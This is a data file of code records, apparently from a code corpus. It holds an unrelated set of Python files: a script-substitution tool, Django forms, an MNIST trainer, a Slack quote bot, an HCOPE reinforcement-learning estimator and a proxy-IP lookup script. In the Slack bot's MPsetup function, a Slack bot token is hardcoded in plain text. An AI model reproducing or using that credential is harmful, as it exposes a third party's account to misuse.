script_subs[k][\"type\"])\n\n # inner substitutions\n if \"subs\" in script_subs[k]:\n if v in script_subs[k][\"subs\"]:\n for inner_k in script_subs[k]['subs'][v].keys():\n _type = script_subs[k]['subs'][v][inner_k][\"type\"]\n _val = script_subs[k]['subs'][v][inner_k][\"val\"]\n logger.info(f\"{k} -> {v} {inner_k} --> {_val}\")\n script_text = _sub_replace(inner_k, _val, _type)\n\n return script_text\n\n\ndef parse_args():\n \"\"\"\n :return: args\n \"\"\"\n epilog = \"\"\"\nUsage examples:\n python3 prism_subs.py -w --script public/prism/scripts/example/prod_v0/prod_1.scr \n\n \"\"\"\n parser = argparse.ArgumentParser(description='prism_result_scan',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=epilog)\n\n parser.add_argument(\"-s\", \"--script\",\n dest=\"script\",\n action=\"store\",\n required=True,\n help=\"Path to script file to sub\")\n\n parser.add_argument(\"-w\", \"--write\",\n dest=\"write\",\n action=\"store_true\",\n help=\"Write output to file\")\n\n args = parser.parse_args()\n return args\n\n\nif __name__ == \"__main__\":\n logging.basicConfig()\n logger.setLevel(logging.INFO)\n\n logger.info(\"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\n logger.info(\"SUBS WITHIN SCRIPT MUST BE MODIFIED TO SUIT THE TARGET SCRIPT\")\n logger.info(\"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\n\n args = parse_args()\n file = args.script\n\n if not os.path.isfile(file):\n logger.error(f\"Unable to find json file {file}\")\n exit(1)\n\n with open(file) as f:\n json_data = f.read()\n\n try:\n # check script formatting by importing it\n script = jstyleson.loads(json_data) # OK\n\n except Exception as e:\n logger.error(e)\n exit(1)\n\n script_text = json.dumps(script, indent=2)\n\n # !! MODIFY !!\n # subs to test, normally this list comes from the GUI or the traveller\n # all the values must be strings\n s = [{\"Lot\": \"12345\"},\n {\"Loc\": \"canada/ontario/milton\"},\n #{\"Loc\": \"us/newyork/buffalo\"},\n {\"TST000Max\": \"9\"}\n ]\n final_script_text = find_sub_items_replace(script_text, s)\n # rename subs key so that prism_dev.py will not error\n final_script_text = final_script_text.replace(\"subs\", \"subs1\", 1)\n logger.info(final_script_text)\n\n if args.write: # save output to file for use with prism_dev.py\n file_out = file.replace(\".scr\", \"_sub.scr\")\n with open(file_out, 'w') as f:\n f.write(final_script_text)\n","sub_path":"prism_subs.py","file_name":"prism_subs.py","file_ext":"py","file_size_in_byte":5236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"33106537","text":"from django import forms\nfrom django.contrib.auth.models import User\nfrom django.utils.translation import gettext_lazy, gettext\n\nfrom . import models\n\nchosen_js = {\"class\": \"chosen-select-contains\"}\n\n\nclass SectionForm(forms.ModelForm):\n class Meta:\n model = models.Section\n exclude = [\n 'shortish_name',\n 'full_name',\n 'full_name_ver1',\n ]\n widgets = {\n 'last_modified_by': forms.HiddenInput(),\n 'head': forms.Select(attrs=chosen_js),\n 'admin': forms.Select(attrs=chosen_js),\n\n }\n\n def __init__(self, *args, **kwargs):\n USER_CHOICES = [(u.id, \"{}, {}\".format(u.last_name, u.first_name)) for u in\n User.objects.all().order_by(\"last_name\", \"first_name\")]\n USER_CHOICES.insert(0, tuple((None, \"---\")))\n\n DIVISION_CHOICES = [(obj.id, \"{} - {}\".format(obj.branch, obj.name)) for obj in\n models.Division.objects.all().order_by(\"branch__region\", \"branch\", \"name\")]\n DIVISION_CHOICES.insert(0, tuple((None, \"---\")))\n\n super().__init__(*args, **kwargs)\n self.fields['head'].choices = USER_CHOICES\n self.fields['division'].choices = DIVISION_CHOICES\n\n\nclass DivisionForm(forms.ModelForm):\n class Meta:\n model = models.Division\n exclude = [\n 'date_last_modified',\n ]\n widgets = {\n 'last_modified_by': forms.HiddenInput(),\n 'head': forms.Select(attrs=chosen_js),\n 'admin': forms.Select(attrs=chosen_js),\n }\n\n def __init__(self, *args, **kwargs):\n BRANCH_CHOICES = [(obj.id, \"{} - {}\".format(obj.region, obj.name)) for obj in\n models.Branch.objects.all().order_by(\"region\", \"name\")]\n BRANCH_CHOICES.insert(0, tuple((None, \"---\")))\n\n super().__init__(*args, **kwargs)\n self.fields['branch'].choices = BRANCH_CHOICES\n\n\nclass BranchForm(forms.ModelForm):\n class Meta:\n model = models.Branch\n exclude = [\n 'date_last_modified',\n ]\n widgets = {\n 'last_modified_by': forms.HiddenInput(),\n 'head': forms.Select(attrs=chosen_js),\n 'admin': forms.Select(attrs=chosen_js),\n }\n\n\nclass RegionForm(forms.ModelForm):\n class Meta:\n model = models.Region\n exclude = [\n 'date_last_modified',\n ]\n widgets = {\n 'last_modified_by': forms.HiddenInput(),\n 'head': forms.Select(attrs=chosen_js),\n 'admin': forms.Select(attrs=chosen_js),\n }\n\n\nclass OrganizationForm(forms.ModelForm):\n class Meta:\n model = models.Organization\n fields = \"__all__\"\n\n\nclass UserCreateForm(forms.Form):\n first_name = forms.CharField(label=gettext_lazy(\"First name\"))\n last_name = forms.CharField(label=gettext_lazy(\"Last name\"))\n email1 = forms.EmailField(label=gettext_lazy(\"Email\"))\n email2 = forms.EmailField(label=gettext_lazy(\"Confirm email address\"))\n\n def clean_email1(self):\n new_email = self.cleaned_data['email1']\n # check to make sure is not a duplicate\n if User.objects.filter(email__iexact=new_email).count() > 0:\n raise forms.ValidationError(gettext(\"This email address already exists in the database.\"))\n # check to make sure is a DFO email\n if new_email.lower().endswith(\"@dfo-mpo.gc.ca\") == False:\n raise forms.ValidationError(gettext(\"The email address provided must be a DFO email address.\"))\n\n # Always return a value to use as the new cleaned data, even if\n # this method didn't change it.\n return new_email\n\n def clean(self):\n cleaned_data = super().clean()\n first_email = cleaned_data.get(\"email1\")\n second_email = cleaned_data.get(\"email2\")\n\n if first_email and second_email:\n # Only do something if both fields are valid so far.\n\n # verify the two emails are the same\n if first_email.lower() != second_email.lower():\n raise forms.ValidationError(gettext(\"Please make sure the two email addresses provided match.\"))\n\n\nclass ScriptForm(forms.ModelForm):\n class Meta:\n model = models.Script\n fields = \"__all__\"\n widgets = {\n 'modified_by': forms.HiddenInput(),\n }\n\n\n\nclass ResponsibilityCenterForm(forms.ModelForm):\n class Meta:\n model = models.ResponsibilityCenter\n fields = \"__all__\"\n\n\nclass ProjectCodeForm(forms.ModelForm):\n class Meta:\n model = models.Project\n fields = \"__all__\"\n","sub_path":"shared_models/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"200585937","text":"from helpers import *\nimport argparse\nimport os\nimport pickle\n\nparser = argparse.ArgumentParser(description='Image Detection')\nparser.add_argument('-use_trained_model', action = 'store_true')\n\n# Create and print the training dataset\ntrain_dataset = dsets.MNIST(root='../../utils/data', train=True, download=True, transform=transforms.ToTensor())\n# print(\"Downloaded the training dataset:\\n \", train_dataset)\n# Create and print the validating dataset\nvalidation_dataset = dsets.MNIST(root='../../utils/data', train=False, download=True, transform=transforms.ToTensor())\n# print(\"Downloaded the validating dataset:\\n \", validation_dataset)\n\nargs = parser.parse_args()\n\nif(not args.use_trained_model):\n\n\tinput_dimensions = 28*28\n\toutput_dimensions = 10\n\n\t# Create a model\n\tmodel = SoftMax(input_dimensions, output_dimensions)\n\n\t# define an optimizer\n\toptimizer = torch.optim.SGD(model.parameters(), lr = 0.1)\n\t# Define a loss function\n\tcriterion = nn.CrossEntropyLoss()\n\t# Define dataloaders\n\ttrainloader = DataLoader(dataset = train_dataset, batch_size = 100)\n\tvalidationloader = DataLoader(dataset = validation_dataset, batch_size = 5000)\n\n\tPlotParameters(model)\n\tplt.title('Before Training')\n\n\n\tn_epochs = 100\n\tfor epoch in range(n_epochs):\n\t\tprint('Running on epoch {}'.format(epoch), flush = True)\n\t\tfor x, y in trainloader:\n\t\t\toptimizer.zero_grad()\n\t\t\tz = model(x.view(-1, 28 * 28))\n\t\t\tloss = criterion(z, y)\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\n\twith open('model/trained_model.pkl', 'wb') as handle:\n\t\tpickle.dump(model, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nelse:\n\tif(not os.path.isfile('model/trained_model.pkl')):\n\t\tprint('Train the model first')\n\t\tos._exit(1)\n\n\twith open('model/trained_model.pkl', 'rb') as f:\n\t\tmodel = pickle.load(f)\t\n\nPlotParameters(model)\nplt.title('After Training')\n\n# Count the classified and miss classified data using the validation set\ncorrect = 0\nincorrect = 0\nfor (x,y) in validation_dataset:\n\tz = model(x.reshape(-1, 28*28))\n\t_, yhat = torch.max(z, 1)\n\tif(yhat == y):\n\t\tcorrect += 1\n\telse:\n\t\tincorrect += 1\n\nprint(\"Analysis:\")\nprint(\"Correctly classified data count =\", correct)\nprint(\"Incorrectly classified data count =\", incorrect)\nprint(\"Accuracy =\", correct/(correct+incorrect))\n\nplt.show()","sub_path":"models/Softmax/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"349115390","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# Licensed under the terms of the MIT License\n\n\"\"\"\nSetup:\n# pip install slackclient\nCopy your slack bot token into bot_token.txt\nCreate quotes.csv file.\n\nStarting:\n# python qotd.py\n\nAdd bot to a channel by inviting it once you authorize the bot for your slack group.\n\"\"\"\n\nimport datetime\nimport json\nimport logging\nimport random\nimport time\n\nfrom slackclient import SlackClient\n\nlogging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)\n\n\ndef MPsetup():\n BOT_NAME = 'mpqotd'\n botuid = '<@U0LJ6Q4S0>: ' # @mpqotd\n token = 'xoxb-49868132742-2Pgt5bXPkSm1GCxhc3ZJg3nj' ### bot token for @mpqotd\n return BOT_NAME, botuid, token\n\n\ndef MBsetup():\n botuid = '<@U1F54AWA3>: ' # @qotd:\n with file('settings.json', 'r') as settingsfile:\n s = json.load(settingsfile)\n BOT_NAME = '<@' + s['bot']['id'] + '>: '\n\n with file('bot_token.txt', 'r') as tokenfile:\n token = tokenfile.read()\n return BOT_NAME, botuid, token\n\n\nwith file('quotes.json', 'r') as quotesfile:\n quotes = [json.loads(line) for line in quotesfile]\n\n### with quotes being JSON, why dont we integrate the attribution of the quote into it?\nwith file('attributions.csv', 'r') as attributionsfile:\n attributions = [line.strip() for line in attributionsfile]\n\ncredsetup = MPsetup\n\n(BOT_NAME, botuid, token) = credsetup()\n\n\n### Slack formatting\n### *bold* `code` _italic_ ~strike~\n\ndef get_bot_idA():\n global BOT_NAME\n api_call = sc.api_call(\"users.list\")\n if api_call.get('ok'):\n # retrieve all users so we can find our bot\n users = api_call.get('members')\n for user in users:\n if 'name' in user and user.get('name') == BOT_NAME:\n ### This is the only diff between our get_bot_io functions, what does it do?\n BOT_NAME = user.get('id')\n return { user['name']:user.get('id') }\n else:\n return \"could not find bot user with the name \" + BOT_NAME\n\n\ndef get_bot_idB():\n api_call = sc.api_call(\"users.list\")\n if api_call.get('ok'):\n # retrieve all users so we can find our bot\n users = api_call.get('members')\n for user in users:\n ### This will return on the first found user, what if there's multiple?\n if 'name' in user and user.get('name') == BOT_NAME:\n return { user['name']:user.get('id') }\n else:\n return \"could not find bot user with the name \" + BOT_NAME\n\n\n### Just to try out different implementations\nget_bot_id = get_bot_idB\n\n\ndef addQuote(msg):\n q = dict()\n q[\"quote\"] = msg['text'].strip('\"“')\n q[\"user\"] = msg['user']\n q[\"time\"] = str(datetime.datetime.utcnow())\n logging.info('Quote is: ' + q[\"quote\"])\n with file('quotes.csv', 'a') as quotesfile:\n logging.debug(\" TRYING TO ADD CONTENT\\n\" + json.dumps(q))\n quotesfile.write(\"\\n\" + json.dumps(q))\n quotes.append(q)\n output = sc.api_call('chat.postMessage', as_user='true', channel=chan,\n text='\\t_*\"' + q[\"quote\"] + '\"*_\\n\\tQuote added. High Five <@' + msg['user'] + '>!')\n logging.debug(output)\n\n\ndef autoping(last, msg):\n ### hardcode the interval to 3 seconds\n now = int(time.time())\n if last + 3 < now:\n sc.server.ping()\n return now\n\n\ndef printQuote(msg):\n output = sc.api_call('chat.postMessage', as_user='true', channel=msg['channel'],\n text='\\t' + random.choice(attributions) + ':\\n\\t\\t_*\"' + random.choice(quotes)[\n \"quote\"] + '\"*_')\n logging.debug(output)\n\n\ndef listQuotes(msg):\n mylist = '\\n'.join('\\t_*' + q[\"quote\"] + '*_' for q in quotes if q is not None)\n output = sc.api_call('chat.postMessage', as_user='true', channel=msg['channel'],\n text='\\t' + mylist + '\\n\\n\\t' + str(len(quotes)) + ' total quotes.')\n logging.debug(output)\n\n\ndef ping(msg):\n logging.debug('calling ping()')\n output = sc.api_call('chat.postMessage', as_user='true', channel=msg['channel'], text=\"PONG!!!\\n\")\n logging.debug(output)\n\n\ndef help(msg):\n output = sc.api_call('chat.postMessage', as_user='true', channel=msg['channel'],\n text=helptext + '\\n\\t' + str(len(quotes)) + ' total quotes.')\n logging.debug(output)\n\n\ncommands = {\n #{'command':s[\"bot\"][\"id\"]+'are you alive', 'response':'_*Yes, I\\'m ALLLIIIVE*_'},\n ### This descriptive format is not consistant, why do outputs are in [] and params in <>?\n 'lol' :{ 'action':printQuote, 'help':'lol [prints random quote]' },\n 'quote':{ 'action':printQuote, 'help':'quote [prints random quote]' },\n 'add' :{ 'action':addQuote, 'help':'add ' },\n 'list' :{ 'action':listQuotes, 'help':'list [prints out all quotes]' },\n 'help' :{ 'action':help, 'help':'help [prints this help text]' },\n 'ping' :{ 'action':ping, 'help':\"ping [pings back, letting you know it's alive]\" },\n}\n\nhelptext = 'Greetings traveler! Commands are:\\n'\nfor c in commands:\n helptext += \"\\t\" + BOT_NAME + commands[c]['help'] + \"\\n\"\ncommands['help']['response'] = helptext\n\n\"\"\"{ u'channel': u'G1FS1CJ84',\nu'team': u'T05311JTT',\nu'text': u'<@U1FRJ3WMU>: lol',\nu'ts': u'1465583194.000034',\nu'type': u'message',\nu'user': u'U0LJ6Q4S0'}\"\"\" ### Typical structure of a command packet\n\n\ndef sendReply(msg):\n msgcontent = msg['text']\n\n ### Disabled the general LOL detector for the time being\n # if 'lol' in text:\n # commands['quote']['action'](chan, msg)\n # return\n\n logging.debug(\"msgcontent ::: %s\" % msgcontent)\n ### Splits the username from commands+params\n fromuser, _, cmdparams = msgcontent.partition(' ')\n ### Splits the cmdparams into cmd and params\n cmd, _, params = cmdparams.partition(' ')\n logging.info('cmd =\"' + cmd + '\"')\n if cmd in commands:\n commands[cmd]['action'](msg)\n\n\n### Different structure for main loop:\n# new_evts = sc.rtm_read()\n# for evt in new_evts:\n# print(evt)\n# if \"type\" in evt:\n# if evt[\"type\"] == \"message\" and \"text\" in evt:\n# message = evt[\"text\"]\n\n\nsc = SlackClient(token)\nlogging.info(\"Connecting as \" + BOT_NAME)\n### Should the sc.rtm_connect be inside of try/except?\nif sc.rtm_connect():\n logging.info(\"...Connected!\")\n logging.debug(\"Bot username:userid %s\", get_bot_id())\n # logging.debug(\"BOT_NAME: %s\", BOT_NAME)\n last_ping = int(time.time())\n while True:\n messages = sc.rtm_read()\n # logging.debug(messages)\n #last_ping = autoping(last_ping)\n for message in messages:\n # logging.debug(message)\n ### simplify all these conditions into a single call function for readability\n if 'type' in message:\n if message['type'] not in ['presence_change', 'user_typing', 'reconnect_url'] \\\n and 'text' in message \\\n and not message['text'].startswith(botuid) \\\n and 'bot_id' not in message:\n logging.debug(message)\n sendReply(message)\n time.sleep(1)\nelse:\n logging.info(\"Connection Failed, invalid token?\")\n\n","sub_path":"qotd.py","file_name":"qotd.py","file_ext":"py","file_size_in_byte":7190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"521915851","text":"import numpy as np\nimport gym\nfrom policies import *\nimport math\nfrom scipy.optimize import minimize\nfrom scipy.special import j1\nfrom scipy.optimize import minimize_scalar\nfrom scipy.stats import norm\nimport matplotlib.pyplot as plt\n\nclass HCOPE(object):\n\n def __init__(self,env,policy,eval_policy,rollout_length,delta=0.1):\n self.env = env\n self.policy= policy\n self.eval_policy=eval_policy\n self.rollout_length = rollout_length\n self.w_policy = self.policy.get_weights()\n # Set up maximum and minimum reward in a trajectory\n self.R_max = 200\n self.R_min = 1\n self.delta=delta\n if eval_policy is None:\n self.e_policy = None\n else:\n self.e_policy=self.eval_policy.get_weights()\n\n\n # Method to generate evaluation policy with gaussian noise added to our behaviour policy\n def setup_e_policy(self):\n noise = np.random.normal(0,0.01,self.w_policy.shape)\n self.e_policy = self.w_policy - noise\n self.eval_policy.update_weights(self.e_policy)\n\n def rollout(self,shift = 0.,policy = None, rollout_length = None,render = False):\n \"\"\" \n Performs one rollout of maximum length rollout_length. \n At each time-step it substracts shift from the reward.\n \"\"\"\n total_reward = 0.\n steps = 0\n\n if(rollout_length==None):\n rollout_length=self.rollout_length\n\n ob = self.env.reset()\n for i in range(rollout_length):\n action,prob = policy.act(ob)\n ob, reward, done, _ = self.env.step(action)\n steps += 1\n total_reward += (reward - shift)\n if(render):\n env.render()\n if done:\n break\n \n return total_reward, steps\n\n # Modified rollout method for HCOPE evaluation. Returns probs of each action that were taken in behavorial as well as evaluation policy\n def mod_rollout(self,shift = 0., rollout_length = None,render = False,random =False,greedy=True):\n \"\"\" \n Performs one rollout of maximum length rollout_length. \n At each time-step it substracts shift from the reward.\n \"\"\"\n \n\n total_reward = 0.\n steps = 0\n rewards = []\n probs = []\n eval_probs =[]\n if(rollout_length==None):\n rollout_length=self.rollout_length\n\n ob = self.env.reset()\n for i in range(rollout_length):\n if random== True:\n action = np.random.randint(0,env.action_space.n)\n action,prob = self.policy.act_action(ob,action)\n eval_action,eval_prob = self.eval_policy.act_action(ob,action)\n elif greedy==False:\n action,prob = self.policy.act(ob,greedy=greedy) \n eval_action,eval_prob = self.eval_policy.act_action(ob,action)\n \n else:\n action,prob = self.policy.act(ob)\n \n eval_action,eval_prob = self.eval_policy.act_action(ob,action)\n \n ob, reward, done, _ = self.env.step(action)\n rewards.append(reward- shift)\n probs.append(prob)\n eval_probs.append(eval_prob)\n steps += 1\n total_reward += (reward - shift)\n if(render):\n env.render()\n if done:\n break\n \n return total_reward, steps,rewards,probs,eval_probs\n\n\n # Evaluate any policy\n def evaluate(self,policy=None,shift=0.,n_rollouts=100,render = False):\n self.policy.update_weights(self.w_policy)\n self.policy.update_filter = False\n rewards = []\n for i in range(n_rollouts):\n total_reward,steps = self.rollout(render=render,shift =shift ,policy = policy)\n rewards.append(total_reward) \n\n rewards = np.asarray(rewards)\n rewards = self.normalize_reward(rewards,self.R_min,self.R_max)\n\n return(np.mean(rewards))\n\n\n # Method to normalize trajectory rewards\n def normalize_reward(self, rewards,R_minus,R_plus):\n return (rewards-R_minus)/(R_plus-R_minus)\n\n\n # Method to generate dataset if it is not provided\n def generate_dataset(self,dataset_size = 100,shift = 0.,render=False):\n # Stop updating filter \n self.policy.update_weights(self.w_policy)\n self.policy.update_filter = False\n self.eval_policy.update_weights(self.e_policy)\n self.eval_policy.update_filter = False\n rewards = []\n probs = []\n eval_probs = []\n\n\n for i in range(dataset_size):\n total_reward,steps,rewards_list,probs_list,eval_probs_list = self.mod_rollout(render=render,shift = shift,greedy=False)\n rewards.append(rewards_list)\n probs.append(probs_list)\n eval_probs.append(eval_probs_list) \n\n rewards = np.asarray(rewards)\n probs = np.asarray(probs)\n eval_probs = np.asarray(eval_probs)\n\n # Shuffle our dataset\n permutation = np.random.permutation(probs.shape[0])\n \n rewards = rewards[permutation,:]\n #rewards=self.normalize_reward(rewards,self.R_min,self.R_max)\n\n probs = probs[permutation,:]\n eval_probs =eval_probs[permutation,:]\n\n # Break the dataset into two parts for estimating c* \n d_pre = rewards[:int(0.05*dataset_size),:]\n d_post = rewards[int(0.05*dataset_size):,:]\n \n pi_b_pre = probs[:int(0.05*dataset_size),:]\n pi_b_post = probs[int(0.05*dataset_size):,:]\n\n pi_e_pre = eval_probs[:int(0.05*dataset_size),:]\n pi_e_post = eval_probs[int(0.05*dataset_size):,:]\n\n return [d_pre,d_post,pi_b_pre,pi_b_post,pi_e_pre,pi_e_post]\n\n\n \n def visualize_IS_distribution(self):\n episodes = 1000\n probs=[]\n self.policy.update_weights(self.w_policy)\n self.policy.update_filter = False\n self.eval_policy.update_weights(self.e_policy)\n self.eval_policy.update_filter = False\n\n eval_probs=[]\n for i in range(episodes):\n total_reward,steps,rewards_list,probs_list,eval_probs_list = self.mod_rollout(greedy=False)\n probs.append(probs_list)\n eval_probs.append(eval_probs_list) \n\n \n probs = np.asarray(probs)\n eval_probs = np.asarray(eval_probs)\n\n importance_weight = np.log(np.asarray([ np.prod(np.asarray(eval_probs[i])/np.asarray(probs[i])) for i in range(episodes)], dtype=float))\n plt.hist(importance_weight, color = 'blue', edgecolor = 'black',bins = int(100))\n\n plt.savefig(\"IS_dist.png\")\n \n\n\n def estimate_behavior_policy(self,dataset):\n d_pre,d_post,pi_b_pre,pi_b_post,pi_e_pre,pi_e_post = dataset\n eval_estimate = self.hcope_estimator(d_pre, d_post, pi_b_pre,pi_b_post,pi_e_pre,pi_e_post,self.delta)\n print(\"Estimate of evaluation policy: {}\".format(eval_estimate))\n\n \n def hcope_estimator(self,d_pre, d_post, pi_b_pre,pi_b_post,pi_e_pre,pi_e_post,delta):\n \"\"\"\n d_pre : float, size = (dataset_split,)\n Trajectory rewards from the behavior policy \n\n d_post : float, size = (dataset_size - dataset_split, )\n Trajectory rewards from the behavior policy \n\n delta : float, size = scalar\n 1-delta is the confidence of the estimator\n \n pi_b : Probabilities for respective trajectories in behaviour policy\n\n pi_e : Probabilities for respective trajectories in evaluation policy\n\n RETURNS: lower bound for the mean, mu as per Theorem 1 of Thomas et al. High Confidence Off-Policy Evaluation\n \"\"\"\n \n print(\"Running HCOPE estimator on the evaluation policy..........\")\n\n d_pre = np.asarray(d_pre)\n d_post = np.asarray(d_post)\n n_post = len(d_post)\n n_pre = len(d_pre)\n\n # Estimate c which maximizes the lower bound using estimates from d_pre\n\n c_estimate = 4.0\n print(\"Intial estimate of c {}.\".format(c_estimate))\n\n def f(x):\n n_pre = len(d_pre)\n Y = np.asarray([min(self.normalize_reward(np.sum(d_pre[i]),self.R_min,self.R_max) * np.prod(pi_e_pre[i]/pi_b_pre[i].astype(np.float64)), x) for i in range(n_pre)], dtype=float)\n importance_weights = np.asarray([ np.prod(pi_e_pre[i]/pi_b_pre[i].astype(np.float64)) for i in range(n_pre)], dtype=float)\n # Empirical mean\n EM = np.sum(Y)/n_pre\n #print(EM)\n # Second term\n term2 = (7.*x*np.log(2./delta)) / (3*(n_post-1))\n # print(term2)\n square_term = ((n_pre*np.sum(np.square(Y))) - np.square(np.sum(Y)))\n if square_term<0:\n square_term=0\n # Third term\n term3 = np.sqrt( (((2.*np.log(2./delta))/(n_post*n_pre*(n_pre-1))) * square_term ))\n # print(term3)\n return (-EM+term2+term3) \n\n c_estimate = minimize(f,np.array([c_estimate]),method='BFGS').x\n\n print(\"The estimate for c* was found to be {}.\".format(c_estimate))\n\n # Use the estimated c for computing the maximum lower bound\n c = c_estimate\n\n if ~isinstance(c, list):\n c = np.full((n_post,), c, dtype=float)\n\n \n \n if n_post<=1:\n raise(ValueError(\"The value of 'n' must be greater than 1\"))\n\n\n Y = np.asarray([min(self.normalize_reward(np.sum(d_post[i]),self.R_min,self.R_max) * np.prod(pi_e_post[i]/pi_b_post[i].astype(np.float64)), c[i]) for i in range(len(d_post))], dtype=float)\n importance_weights = np.asarray([ np.prod(pi_e_post[i]/pi_b_post[i].astype(np.float64)) for i in range(n_post)], dtype=float)\n \n # Empirical mean\n c = np.asarray([max(1,i) for i in c])\n\n EM = np.sum(Y/c[0])/(np.sum(1/c))\n\n # Second term\n term2 = (7.*n_post*np.log(2./delta)) / (3*(n_post-1)*np.sum(1/c))\n\n # Third term\n square_term = (n_post*np.sum(np.square(Y/c)) - np.square(np.sum(Y/c)))\n if square_term<0:\n square_term = 0\n term3 = np.sqrt( ((2*np.log(2./delta))/(n_post-1)) * square_term) / np.sum(1/c)\n\n\n # Sanity check on determinant\n\n k1 = (7.*n_post)/(3*(n_post-1)) \n k2 = (n_post*np.sum(np.square(Y/c)) - np.square(np.sum(Y/c)))*(2./(n_post-1))\n k3 = (EM - term2 - term3)*np.sum(1/c) - (np.sum(Y/c))\n\n if(k2-4*k1*k3<0):\n print(\"The estimate of u_ is of zero confidence\")\n else:\n if(-np.sqrt(k2)+np.sqrt(k2-4*k1*k3))<0:\n print(\"The estimate of u_ is of zero confidence\")\n\n # Final estimate\n return EM - term2 - term3\n\n\n\n\n\n\n\n\n\n\n\nif __name__==\"__main__\":\n # Create a gym environment\n env_name = \"MountainCar-v0\"\n env = gym.make(env_name)\n\n # Assuming discrete action space\n action_size = env.action_space.n\n ob_size = env.observation_space.shape[0]\n\n # Create a bilayer mlp with softmax\n policy_params={'type':'bilayer',\n 'ob_filter':'MeanStdFilter',\n 'ob_dim':ob_size,\n 'ac_dim':action_size}\n policy = BilayerPolicy_softmax(policy_params)\n eval_policy = BilayerPolicy_softmax(policy_params)\n\n my_hcope = HCOPE(env,policy,eval_policy,rollout_length = 1000,delta =0.1)\n my_hcope.setup_e_policy()\n\n dataset = my_hcope.generate_dataset(dataset_size=100,shift=-2)\n print(\"Estimate of behavorial policy: {}\".format(my_hcope.evaluate(policy=my_hcope.policy,shift = -2,n_rollouts=100,render =False)))\n\n my_hcope.estimate_behavior_policy(dataset)\n print(\"True estimate of evaluation policy: {}\".format(my_hcope.evaluate(policy=my_hcope.eval_policy,shift = -2,n_rollouts=100,render =False)))\n\n #my_hcope.visualize_IS_distribution()","sub_path":"Safe-RL/safeRL/HCOPE/hcope.py","file_name":"hcope.py","file_ext":"py","file_size_in_byte":11883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"523528808","text":"\nimport IP_test\nimport random\nimport re\n\nIP = []\nPORT = []\nHTTP = []\nproxy = {}\n\ndef Finder():\n print(\"输入代理区域/IP/类型/匿名类型/端口\")\n while True:\n C = input(\"{Finder}[输入查找内容]{>>>}\")\n f = open('IP_NEW_pool.txt','r',encoding='utf-8')\n c = C.replace('[NEW]','')\n for x in f:\n if c in x:\n x = x.replace('\\n','')\n print(x)\n f.close()\ndef make1():\n C = input(\"{Finder}[输入IP区域]{>>>}\")\n f = open('IP_NEW_pool.txt','r',encoding='utf-8')\n c = C.replace('[NEW]','')\n for x in f:\n if c in x:\n x = x.replace('\\n','')\n print(x)\n IP1 = re.findall(r'(\\d+\\.\\d+\\.\\d+\\.\\d+)',str(x))\n IP2 = re.findall(r'PORT:(.+?) 类',str(x))\n #IP:118.212.104.134 PORT:9999 类型:HTTP 位置:江西省新余市 联通 最后验证时间:2020-06-16 16:31:01\n IP3 = re.findall(r'类型:(.+?) 位',str(x))\n for y,z,a in zip(IP1,IP2,IP3):\n IP.append(y)\n PORT.append(z)\n HTTP.append(a)\n i = random.randint(1,len(IP))\n x = IP_test.IP[i]\n y = IP_test.PORT[i]\n z = IP_test.HTTP[i]\n proxy = {z:\"http://\"+x+\":\"+y}\n f.close()\ndef make():\n IP_test.get_IP()\n i = random.randint(1,len(IP_test.IP))\n x = IP_test.IP[i]\n y = IP_test.PORT[i]\n z = IP_test.HTTP[i]\n proxy = {z:\"http://\"+x+\":\"+y}\ndef make2(C):\n if C == None:\n C = input(\"{Finder}[输入IP的识别码{>>>}\")\n else:\n C = C\n f = open('IP_pool.txt','r',encoding='utf-8')\n for x in f:\n a = re.findall(r'\\[(\\d+?)\\]',x)\n for y in a:\n y = str(y)\n if str(C) in y:\n x = x.replace('\\n','')\n print(x)\n IP1 = re.findall(r'(\\d+\\.\\d+\\.\\d+\\.\\d+)',str(x))\n IP2 = re.findall(r'PORT:(.+?)-',str(x))\n #IP:118.212.104.134 PORT:9999 类型:HTTP 位置:江西省新余市 联通 最后验证时间:2020-06-16 16:31:01\n IP3 = re.findall(r'\\[HTTP/HTTPS\\]:(.+?)}',str(x))\n for y,z,a in zip(IP1,IP2,IP3):\n IP.append(y)\n PORT.append(z)\n HTTP.append(a)\n x = IP[0]\n y = PORT[0]\n z = HTTP[0]\n proxy = {z:\"http://\"+x+\":\"+y}\n print(proxy)\n f.close()\ndef main():\n while True:\n i = input(\"{IP}{>>>}\")\n if i == \"/IP -get\":\n import IP_get\n IP_get.IP_get_main()\n elif i == \"/IP -test\":\n IP_test.IP_test_main()\n elif i == \"/IP -find\":\n Finder()\n elif i == '/stop':\n break\n","sub_path":"pycrawler/IP_run.py","file_name":"IP_run.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"630671444","text":"# Copyright 2013 OpenStack Foundation\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\n/template_configs endpoint for Daisy v1 API\n\"\"\"\n\nfrom oslo_log import log as logging\nfrom webob.exc import HTTPBadRequest\nfrom webob.exc import HTTPForbidden\nfrom webob.exc import HTTPNotFound\nimport json\n\nfrom 